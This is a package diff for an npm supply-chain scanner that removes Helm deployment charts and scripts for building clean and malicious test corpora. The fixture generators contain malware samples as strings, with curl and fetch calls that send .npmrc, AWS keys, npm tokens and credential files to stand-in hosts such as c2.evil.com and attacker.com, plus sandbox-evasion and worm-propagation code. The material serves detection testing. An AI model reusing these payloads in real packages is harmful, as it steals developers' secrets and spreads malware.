@lateos/npm-scan 0.18.3 → 1.1.0

package/deploy/helm/npm-scan/Chart.yaml

@@ -1,22 +0,0 @@
-apiVersion: v2
-name: npm-scan
-description: npm supply chain security scanner — BYOC Helm chart for enterprise/government deployments
-type: application
-version: 1.0.0
-appVersion: "1.0.0"
-keywords:
-  - npm
-  - security
-  - supply-chain
-  - scanner
-  - byoc
-  - stig
-  - fips
-  - soc2
-  - fedramp
-sources:
-  - https://github.com/lateos-ai/npm-scan
-maintainers:
-  - name: Lateos
-    email: hello@lateos.ai
-dependencies: []

package/deploy/helm/npm-scan/templates/_helpers.tpl

@@ -1,9 +0,0 @@
-{{- define "npm-scan.name" -}}
-{{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }}
-{{- end }}
-
-{{- define "npm-scan.labels" -}}
-helm.sh/chart: {{ .Chart.Name }}-{{ .Chart.Version }}
-app.kubernetes.io/instance: {{ .Release.Name }}
-app.kubernetes.io/managed-by: {{ .Release.Service }}
-{{- end }}

package/deploy/helm/npm-scan/templates/api.yaml

@@ -1,94 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-api
-  labels:
-    app: {{ include "npm-scan.name" . }}-api
-    {{- include "npm-scan.labels" . | nindent 4 }}
-  annotations:
-    stig: "SRG-APP-000141"
-spec:
-  replicas: {{ .Values.api.replicas }}
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-api
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-api
-    spec:
-      containers:
-        - name: api
-          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}
-          command: ["node", "cli/cli.js", "serve"]
-          ports:
-            - containerPort: {{ .Values.api.port }}
-          env:
-            - name: API_PORT
-              value: "{{ .Values.api.port }}"
-            - name: API_HOST
-              value: "{{ .Values.api.host }}"
-            - name: NPM_SCAN_LICENSE_KEY
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-license
-                  key: key
-                  optional: true
-            - name: NPM_SCAN_PREMIUM
-              value: "{{ .Values.premium.enabled }}"
-            {{- if .Values.premium.byoc.enabled }}
-            - name: NPM_SCAN_BYOC
-              value: "true"
-            - name: NPM_SCAN_CLOUD_PROVIDER
-              value: "{{ .Values.premium.byoc.cloudProvider }}"
-            {{- end }}
-            {{- if .Values.siem.enabled }}
-            - name: SIEM_ENABLED
-              value: "true"
-            - name: SIEM_TYPE
-              value: "{{ .Values.siem.type }}"
-            - name: SIEM_ENDPOINT
-              value: "{{ .Values.siem.endpoint }}"
-            - name: SIEM_PORT
-              value: "{{ .Values.siem.port }}"
-            {{- end }}
-            {{- if .Values.sso.enabled }}
-            - name: SSO_ENABLED
-              value: "true"
-            - name: SSO_PROVIDER
-              value: "{{ .Values.sso.provider }}"
-            - name: SSO_ISSUER_URL
-              value: "{{ .Values.sso.issuerUrl }}"
-            {{- end }}
-            {{- if .Values.postgresql.enabled }}
-            - name: PG_HOST
-              value: "{{ .Values.postgresql.host }}"
-            - name: PG_PORT
-              value: "{{ .Values.postgresql.port }}"
-            - name: PG_DATABASE
-              value: "{{ .Values.postgresql.database }}"
-            - name: PG_USERNAME
-              value: "{{ .Values.postgresql.username }}"
-            - name: PG_PASSWORD
-              valueFrom:
-                secretKeyRef:
-                  name: {{ .Values.postgresql.existingSecret | default (printf "%s-pg" (include "npm-scan.name" .)) }}
-                  key: password
-                  optional: true
-            {{- end }}
-          resources: {{- toYaml .Values.api.resources | nindent 12 }}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: {{ include "npm-scan.name" . }}-api
-  labels:
-    app: {{ include "npm-scan.name" . }}-api
-spec:
-  type: {{ .Values.service.type }}
-  ports:
-    - port: {{ .Values.service.port }}
-      targetPort: {{ .Values.api.port }}
-  selector:
-    app: {{ include "npm-scan.name" . }}-api

package/deploy/helm/npm-scan/templates/ingress.yaml

@@ -1,28 +0,0 @@
-{{- if .Values.ingress.enabled -}}
-apiVersion: networking.k8s.io/v1
-kind: Ingress
-metadata:
-  name: {{ include "npm-scan.name" . }}
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-  {{- with .Values.ingress.annotations }}
-  annotations: {{- toYaml . | nindent 4 }}
-  {{- end }}
-spec:
-  {{- with .Values.ingress.className }}
-  ingressClassName: {{ . }}
-  {{- end }}
-  rules:
-    - host: {{ .Values.ingress.host | quote }}
-      http:
-        paths:
-          - path: /
-            pathType: Prefix
-            backend:
-              service:
-                name: {{ include "npm-scan.name" . }}-api
-                port:
-                  number: {{ .Values.service.port }}
-  {{- with .Values.ingress.tls }}
-  tls: {{- toYaml . | nindent 4 }}
-  {{- end }}
-{{- end }}

package/deploy/helm/npm-scan/templates/postgresql.yaml

@@ -1,67 +0,0 @@
-{{- if .Values.postgresql.enabled }}
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-postgresql
-  labels:
-    app: {{ include "npm-scan.name" . }}-postgresql
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-postgresql
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-postgresql
-    spec:
-      containers:
-        - name: postgresql
-          image: postgres:16-alpine
-          ports:
-            - containerPort: 5432
-          env:
-            - name: POSTGRES_DB
-              value: "{{ .Values.postgresql.database }}"
-            - name: POSTGRES_USER
-              value: "{{ .Values.postgresql.username }}"
-            - name: POSTGRES_PASSWORD
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-pg
-                  key: password
-          {{- if .Values.persistence.enabled }}
-          volumeMounts:
-            - name: data
-              mountPath: /var/lib/postgresql/data
-      volumes:
-        - name: data
-          persistentVolumeClaim:
-            claimName: {{ include "npm-scan.name" . }}-pg
-          {{- end }}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: {{ include "npm-scan.name" . }}-postgresql
-spec:
-  ports:
-    - port: 5432
-  selector:
-    app: {{ include "npm-scan.name" . }}-postgresql
----
-{{- if .Values.persistence.enabled }}
-apiVersion: v1
-kind: PersistentVolumeClaim
-metadata:
-  name: {{ include "npm-scan.name" . }}-pg
-spec:
-  accessModes: [ReadWriteOnce]
-  resources:
-    requests:
-      storage: {{ .Values.persistence.size }}
-  {{- with .Values.persistence.storageClass }}
-  storageClassName: {{ . }}
-  {{- end }}
-{{- end }}
-{{- end }}

package/deploy/helm/npm-scan/templates/secrets.yaml

@@ -1,19 +0,0 @@
-apiVersion: v1
-kind: Secret
-metadata:
-  name: {{ include "npm-scan.name" . }}-license
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-type: Opaque
-stringData:
-  key: "{{ .Values.license.key }}"
----
-{{- if not .Values.postgresql.existingSecret }}
-apiVersion: v1
-kind: Secret
-metadata:
-  name: {{ include "npm-scan.name" . }}-pg
-  labels: {{- include "npm-scan.labels" . | nindent 4 }}
-type: Opaque
-stringData:
-  password: "{{ .Values.postgresql.password }}"
-{{- end }}

package/deploy/helm/npm-scan/templates/worker.yaml

@@ -1,32 +0,0 @@
-{{- if .Values.worker.enabled }}
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: {{ include "npm-scan.name" . }}-worker
-  labels:
-    app: {{ include "npm-scan.name" . }}-worker
-    {{- include "npm-scan.labels" . | nindent 4 }}
-spec:
-  replicas: {{ .Values.worker.replicas }}
-  selector:
-    matchLabels:
-      app: {{ include "npm-scan.name" . }}-worker
-  template:
-    metadata:
-      labels:
-        app: {{ include "npm-scan.name" . }}-worker
-    spec:
-      containers:
-        - name: worker
-          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
-          imagePullPolicy: {{ .Values.image.pullPolicy }}
-          command: ["node", "cli/cli.js"]
-          env:
-            - name: NPM_SCAN_LICENSE_KEY
-              valueFrom:
-                secretKeyRef:
-                  name: {{ include "npm-scan.name" . }}-license
-                  key: key
-                  optional: true
-          resources: {{- toYaml .Values.worker.resources | nindent 12 }}
-{{- end }}

package/deploy/helm/npm-scan/values.byoc.yaml

@@ -1,75 +0,0 @@
-# BYOC Enterprise values example
-# Deploy to your VPC: helm install -f values.byoc.yaml npm-scan ./
-
-image:
-  repository: lateos/npm-scan
-  tag: "1.0.0"
-
-premium:
-  enabled: true
-  edition: enterprise
-  byoc:
-    enabled: true
-    cloudProvider: aws
-    vpcId: vpc-0123456789abcdef0
-    region: us-east-1
-    clusterName: npm-scan-enterprise
-    externalDb: true
-    externalRedis: true
-
-license:
-  key: "npm-scan-enterprise-XXXXX.YOUR-SIGNATURE-HERE"
-  secret: "your-license-secret"
-
-siem:
-  enabled: true
-  type: cef
-  endpoint: log-collector.your-company.com
-  port: 514
-  protocol: tcp
-
-pdf:
-  enabled: true
-
-sso:
-  enabled: true
-  provider: oidc
-  clientId: npm-scan-enterprise
-  issuerUrl: https://sso.your-company.com/realms/enterprise
-
-postgresql:
-  enabled: false
-  host: your-rds-endpoint.rds.amazonaws.com
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-
-redis:
-  enabled: false
-  host: your-redis-endpoint.cache.amazonaws.com
-  port: 6379
-
-ingress:
-  enabled: true
-  className: nginx
-  host: npm-scan.your-company.com
-  tls:
-    - secretName: npm-scan-tls
-      hosts:
-        - npm-scan.your-company.com
-
-persistence:
-  enabled: true
-  size: 50Gi
-  storageClass: gp3
-
-worker:
-  replicas: 4
-  resources:
-    requests:
-      cpu: 500m
-      memory: 1Gi
-    limits:
-      cpu: 2
-      memory: 2Gi

package/deploy/helm/npm-scan/values.yaml

@@ -1,103 +0,0 @@
-# Helm values for npm-scan BYOC
-# Override per environment: helm install -f values-prod.yaml
-
-image:
-  repository: lateos/npm-scan
-  tag: latest
-  pullPolicy: Always
-
-replicaCount: 1
-
-license:
-  key: ""
-  secret: ""
-
-premium:
-  enabled: false
-  edition: premium
-  byoc:
-    enabled: false
-    cloudProvider: ""
-    vpcId: ""
-    region: ""
-    clusterName: ""
-    externalDb: true
-    externalRedis: true
-
-siem:
-  enabled: false
-  type: cef
-  endpoint: ""
-  port: 514
-  protocol: tcp
-  apiKey: ""
-
-pdf:
-  enabled: false
-
-sso:
-  enabled: false
-  provider: oidc
-  clientId: ""
-  clientSecret: ""
-  issuerUrl: ""
-  allowedDomains: []
-
-postgresql:
-  enabled: true
-  host: ""
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-  existingSecret: ""
-
-api:
-  enabled: true
-  port: 8000
-  host: 0.0.0.0
-  replicas: 1
-  corsOrigins: ["*"]
-  resources:
-    requests:
-      cpu: 100m
-      memory: 128Mi
-    limits:
-      cpu: 500m
-      memory: 512Mi
-
-worker:
-  enabled: true
-  replicas: 2
-  resources:
-    requests:
-      cpu: 200m
-      memory: 256Mi
-    limits:
-      cpu: 1
-      memory: 1Gi
-
-ingress:
-  enabled: false
-  className: ""
-  annotations: {}
-  host: npm-scan.example.com
-  tls: []
-
-service:
-  type: ClusterIP
-  port: 80
-
-persistence:
-  enabled: true
-  size: 10Gi
-  storageClass: ""
-
-nodeSelector: {}
-tolerations: []
-affinity: {}
-
-redis:
-  enabled: false
-  host: ""
-  port: 6379

package/scripts/download-corpus.js

@@ -1,30 +0,0 @@
-import fetch from 'node-fetch';
-import { writeFileSync, existsSync } from 'fs';
-
-const TOP_PKGS = [
-  'lodash', 'chalk', 'react', 'axios', 'express',
-  'tslib', 'commander', 'typescript', 'vue', 'next',
-  'yargs', 'debug', 'moment', 'uuid', 'semver',
-  'rimraf', 'eslint', 'prettier', 'webpack', 'babel-core',
-  'underscore', 'request', 'async', 'cheerio', 'bluebird',
-  'jest', 'mocha', 'dotenv', 'glob', 'node-fetch',
-  'minimist', 'body-parser', 'cors', 'helmet', 'jsonwebtoken',
-  'socket.io', 'redis', 'mongoose', 'sequelize', 'pg',
-  'passport', 'nodemailer', 'multer', 'bcrypt', 'winston',
-  'luxon', 'dayjs', 'class-validator', 'rxjs', 'redux'
-];
-
-for (const pkg of TOP_PKGS) {
-  const file = `tests/corpus/clean/${pkg}.tgz`;
-  if (existsSync(file)) { console.log(`SKIP ${pkg}`); continue; }
-  try {
-    const res = await fetch(`https://registry.npmjs.org/${pkg}/latest`);
-    const meta = await res.json();
-    const tarRes = await fetch(meta.dist.tarball);
-    const buf = Buffer.from(await tarRes.arrayBuffer());
-    writeFileSync(file, buf);
-    console.log(`OK ${pkg} (${(buf.length/1024).toFixed(0)}KB)`);
-  } catch (e) {
-    console.log(`FAIL ${pkg}: ${e.message}`);
-  }
-}

package/scripts/gen-mal-corpus.js

@@ -1,35 +0,0 @@
-import { execSync } from 'child_process';
-import { writeFileSync, mkdirSync, rmSync } from 'fs';
-import { join } from 'path';
-
-const BASE = '/tmp/npm-scan-mal';
-
-const MALS = [
-  { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
-  { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
-  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
-  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
-  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
-  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
-  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
-  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
-  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
-  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
-  { name: 'mal-prop-1', pkg: { name: '@evil/worm' }, js: 'execSync("npm install ./worm-pkg"); execSync("npm link")' },
-  { name: 'mal-prop-2', pkg: {}, js: 'fs.writeFileSync("../lodash/node_modules/worm/index.js", "module.exports = { compromised: true }")' },
-  { name: 'mal-prop-3', pkg: { name: 'worm-pkg' }, js: `const pj = require('../express/package.json'); pj.scripts.install = 'node worm.js'; fs.writeFileSync('../express/package.json', JSON.stringify(pj))` },
-];
-
-for (const mal of MALS) {
-  const dir = join(BASE, mal.name);
-  rmSync(dir, { recursive: true, force: true });
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: mal.name, version: '1.0.0', ...mal.pkg }));
-  if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
-  execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
-  console.log(`OK ${mal.name}`);
-}
-
-console.log('All mal corpus entries generated.');
-console.log('Total:', MALS.length);
-console.log('New entries: tamper-1, tamper-2, dormant-1, dormant-2, dormant-3, evasion-1, evasion-2, evasion-3');

package/scripts/generate-campaign-fixtures.js

@@ -1,170 +0,0 @@
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'fs';
-import { execSync } from 'child_process';
-import { tmpdir } from 'os';
-import { join } from 'path';
-import { fileURLToPath } from 'url';
-import { dirname } from 'path';
-
-const __dirname = dirname(fileURLToPath(import.meta.url));
-const CORPUS_DIR = join(__dirname, '..', 'tests', 'corpus', 'malicious');
-
-const TOP_TYPOS = [
-  'reacct', 'expres', 'axiox', 'chlak', 'vuue', 'typescrip',
-  'momnet', 'uuuid', 'commnder', 'debuge', 'semverr', 'underscoree',
-  'requesst', 'asycn',
-];
-
-const BINARY_NAMES = ['bun', 'deno', 'go', 'rustc', 'python'];
-
-function writeFile(filePath, content) {
-  writeFileSync(filePath, content, 'utf8');
-}
-
-function createElfBinary(size = 4096) {
-  const buf = Buffer.alloc(size, 0);
-  buf[0] = 0x7f;
-  buf[1] = 0x45;
-  buf[2] = 0x4c;
-  buf[3] = 0x46;
-  buf[4] = 2;
-  buf[5] = 1;
-  buf[6] = 1;
-  buf[7] = 0;
-  return buf;
-}
-
-function createPeBinary(size = 4096) {
-  const buf = Buffer.alloc(size, 0);
-  buf[0] = 0x4d;
-  buf[1] = 0x5a;
-  return buf;
-}
-
-function buildTarball(dir, tmpParent) {
-  const tgzPath = join(CORPUS_DIR, `${dir}.tgz`);
-  execSync(`tar czf "${tgzPath}" -C "${tmpParent}" "${dir}"`, { stdio: 'pipe', shell: 'powershell' });
-}
-
-function createCampaign1Package(n) {
-  const dir = `campaign-1-${String(n).padStart(3, '0')}`;
-  const pkgJson = {
-    name: `vulnerable-package-${n}`,
-    version: '99.0.0',
-    description: 'Campaign 1 test fixture',
-    repository: { url: 'https://github.enterprise.internal/org/repo' },
-    homepage: 'https://jira.internal/browse/PROJ-123',
-    bugs: { url: 'https://docs.internal/issues' },
-    scripts: {
-      postinstall: 'node -e "eval(Buffer.from(\'dmFyIHggPSAx\' ,\'base64\').toString())"',
-    },
-  };
-
-  const distIndexJs = `(function() {
-  const os = require('os');
-  const env = process.env;
-  const profile = {
-    hostname: os.hostname(),
-    platform: os.platform(),
-    arch: os.arch(),
-    env: { AWS_ACCESS_KEY_ID: env.AWS_ACCESS_KEY_ID }
-  };
-  console.log('[RECON]', JSON.stringify(profile));
-})();`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp1-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz`);
-}
-
-function createCampaign2Package(n) {
-  const dir = `campaign-2-${String(n).padStart(3, '0')}`;
-  const typoName = TOP_TYPOS[(n - 1) % TOP_TYPOS.length];
-  const binName = BINARY_NAMES[(n - 1) % BINARY_NAMES.length];
-
-  const pkgJson = {
-    name: typoName,
-    version: '1.0.0',
-    description: 'Test fixture',
-  };
-
-  const distIndexJs = `const fs = require('fs');
-const { execSync } = require('child_process');
-const awsKey = process.env.AWS_ACCESS_KEY_ID;
-const npmToken = process.env.NODE_AUTH_TOKEN;
-const data = fs.readFileSync('/etc/passwd', 'utf8');
-if (awsKey || npmToken) {
-  fetch('https://attacker.com/creds', {
-    method: 'POST',
-    body: JSON.stringify({ awsKey, npmToken, data })
-  });
-}`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp2-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  mkdirSync(join(pkgDir, 'bin'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  writeFileSync(join(pkgDir, 'bin', binName), createElfBinary(32768));
-  writeFileSync(join(pkgDir, 'bin', `${binName}.exe`), createPeBinary(32768));
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz (typo: ${typoName}, binary: ${binName})`);
-}
-
-function createCampaign3Package() {
-  const dir = 'campaign-3-infostealer';
-
-  const pkgJson = {
-    name: 'mouse5212-super-formatter',
-    version: '1.0.0',
-    description: 'Super formatter',
-  };
-
-  const distIndexJs = `const fs = require('fs');
-const { execSync } = require('child_process');
-const secretFiles = ['package.json', '.env', '.npmrc', '.aws/credentials'];
-for (const file of secretFiles) {
-  try {
-    const content = fs.readFileSync(process.env.HOME + '/' + file, 'utf8');
-    const ghToken = 'ghp_stub1234567890abcdefghijklmnopqr';
-    const exfilUrl = 'https://api.github.com/repos/attacker/stolen-secrets/contents/data.json';
-    execSync('curl -X PUT "' + exfilUrl + '" -H "Authorization: token ' + ghToken + '" -d ' + JSON.stringify(content));
-  } catch (e) {
-  }
-}`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp3-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz`);
-}
-
-// ─── Generate All Campaigns ─────────────────────────────────────────
-console.log('Generating Campaign 1 (33 packages)...');
-for (let i = 1; i <= 33; i++) {
-  createCampaign1Package(i);
-}
-
-console.log('Generating Campaign 2 (14 packages)...');
-for (let i = 1; i <= 14; i++) {
-  createCampaign2Package(i);
-}
-
-console.log('Generating Campaign 3 (1 package)...');
-createCampaign3Package();
-
-console.log('\nAll 48 campaign tarballs generated successfully!');